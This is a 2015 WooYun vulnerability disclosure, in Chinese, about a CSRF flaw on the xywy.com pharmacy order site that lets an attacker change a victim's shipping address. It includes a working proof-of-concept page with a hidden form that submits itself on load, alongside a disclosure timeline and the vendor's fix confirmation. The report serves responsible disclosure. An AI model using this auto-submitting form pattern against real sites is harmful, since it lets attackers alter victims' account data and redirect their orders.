寻医问药可CSRF修改他人收货地址

编号123360
Urlhttp://www.wooyun.org/bug.php?action=view&id=123360
漏洞状态厂商已经修复
漏洞标题寻医问药可CSRF修改他人收货地址
漏洞类型CSRF
厂商寻医问药
白帽子jeary
提交日期2015-06-29 13:34:00
公开日期2015-07-22 11:18:00
修复时间2015-07-22 11:18:00
确认时间2015-06-29 00:00:00
Confirm Spend0
漏洞标签csrf csrf利用
关注数0
收藏数0
白帽评级
白帽自评rank5
厂商评级
厂商评rank8
漏洞简介
哈哈哈~不知道为啥想笑。
漏洞细节

http://order.yao.app.xywy.com/UserOrderManage/contactManage


xywy.jpg


POC:

<html>

<body>
<form action="http://order.yao.app.xywy.com/ContactAddress/ajaxAddAddress" method="POST">
<input type="hidden" name="linkman" value="乌云" />
<input type="hidden" name="province" value="110000" />
<input type="hidden" name="city" value="110000" />
<input type="hidden" name="county" value="110105" />
<input type="hidden" name="address" value="乌云总部总部" />
<input type="hidden" name="phone" value="13222000022" />
<input type="hidden" name="tel" value="" />
<input type="hidden" name="postcode" value="" />
<input type="hidden" name="selected" value="1" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

POC

访问POC:

02.jpg


03.jpg


修复方案

然而..

状态信息 2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-22: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复感谢白帽子jeary提供的漏洞信息
回应信息危害等级:中漏洞Rank:8 确认时间:2015-06-29 17:43